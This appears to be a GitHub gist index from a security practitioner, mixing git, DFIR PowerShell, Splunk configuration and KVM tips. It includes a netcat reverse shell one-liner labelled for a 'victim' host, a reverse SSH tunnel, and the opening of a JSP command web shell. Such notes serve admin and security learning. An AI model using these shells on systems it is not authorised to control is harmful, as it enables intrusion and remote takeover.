christian christian-taillon

@christian-taillon
christian-taillon / gist:3f5c27d67387c3ac74ceff005682d511
Created March 2, 2021 17:26
Updated Master Git Branch to Main
# the move to main from master has caused me a few headaches
# Azure DevOps uses main, for example,
# but my Git client uses master,
# and it would cause a lot of conflicts.
# here are some steps to move master to main.
# rename the local master branch to main
git branch -m master main
# push the new main to your repo and set it as the upstream branch
git push -u origin main
@christian-taillon
christian-taillon / CVE-2021-26855
Created March 9, 2021 03:46
threat-actor source IP IOC's related to CVE-2021-26855
@christian-taillon
christian-taillon / downloadedFiles_zoneIdentifier.ps1
Last active June 7, 2021 16:24
This script is inelegant but straightforward and identifies downloaded files and the url from which the file was downloaded (if ADS Zone Identifier is available) in the System32 directory. Additionally, it also identifies .iso and .img files in the user's download directory. This is intended for Incident Responders, SOC Analysts, and Threat Rese…
# ADS Zone Identifier for Downloaded Files
# Date: 06-07-2021
# Author to blame when it breaks: Christian Taillon
# Description: This script is inelegant but straightforward and identifies downloaded files and the url from which the file was downloaded (if ADS Zone Identifier is available) in the System32 directory. Additionally, it also identifies .iso and .img files in the user's download directory. This is intended for Incident Responders, SOC Analysts, and Threat Researchers. I attempt to remove some popular OS files for those of us who do a terrible job at deleting huge .img files after they have served their purpose.
# set variables
New-Variable -Name "sys32_path" -Value "C:\Windows\System32\*"
New-Variable -Name "iso_downloads_path" -Value "C:\Users\*\Downloads\*.iso"
New-Variable -Name "img_downloads_path" -Value "C:\Users\*\Downloads\*.img"
@christian-taillon
christian-taillon / eventtypes.conf
Last active July 19, 2021 16:52
Varonis Add-on Breaking Tag Searches The TA-Varonis-DatAlert Add-on for Splunk version 1.2.0 will break Splunk's ability to search with tags used by the app. The issue is in the eventtypes.conf where macros are used in event definitions. This is something that is not supported in Splunk. Eventtypes need to be called when tags are used in searche…
[possible_credential_stuffing_attack_from_a_single_source]
search = sourcetype=varonis:ta cef_vendor="Varonis Inc." cs2="Abnormal access behavior: possible credential stuffing attack from a single source"
[possible_distributed_credential_stuffing_attack]
search = sourcetype=varonis:ta cef_vendor="Varonis Inc." cs2="Abnormal access behavior: possible distributed credential stuffing attack"
[access_to_atypical_mailboxes]
search = sourcetype=varonis:ta cef_vendor="Varonis Inc." cs2="Abnormal admin behavior: access to atypical mailboxes"
[accumulative_increase_in_amount_of_devices_accessed]
@christian-taillon
christian-taillon / simple_reverse_ssh_shell.sh
Created November 11, 2021 00:03
A very simple way to get a reverse shell. Often used adversarially, I use it for managing Linux hosts behind a Firewall. Your security product may attempt to prevent this.
# on the host you want to control
echo "start sshd, just in case"
sudo systemctl start sshd
echo "open a shell with the reverse option: remote port 43022 (random unassigned port) forwards to local port 22 (ssh)"
ssh -R 43022:localhost:22 $USER$@$REMOTEHOST$
# on the device you have control over
ssh localhost -p 43022
1. Extract the OVA: tar xvf ./$VM_TEMPLATE_NAME.ova
2. Use qemu-img to convert the VMDK to qcow2: qemu-img convert -O qcow2 ./$VM_TEMPLATE_NAME.vmdk /<desired_location>/$VM_TEMPLATE_NAME.qcow2

Create a new Guest VM in virt-manager, provide the directory containing the qcow2 file as the storage path, and create the VM.

@christian-taillon
christian-taillon / NetcatReverseShell.md
Created November 29, 2021 21:57
This is a simple note that denotes arguably one of the simplest methods of creating a Reverse Shell.

Victim: nc -c /bin/bash your_external_ip <unfiltered_port>

Your Host: nc -l -p <unfiltered_port> -vvv

You need spice-vdagent

Debian or Kali Linux installed as KVM guests do not automatically have qemu-guest-agent or spice-vdagent installed. This prevents seamless movement of the mouse cursor between the guest and host desktop in Virtual Machine Manager (requiring Ctrl-Alt to release the cursor from the guest window).

To fix this, install both qemu-guest-agent and spice-vdagent on each guest and reboot the guests.

$ sudo apt install qemu-guest-agent
$ sudo apt install spice-vdagent
@christian-taillon
christian-taillon / cmd.jsp
Created April 8, 2022 18:26 — forked from nikallass/cmd.jsp
Simple JSP cmd shell
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
@christian-taillon
christian-taillon / qbot_c2.txt
Created October 10, 2022 01:05
Qakbot C2 Fall Campaigns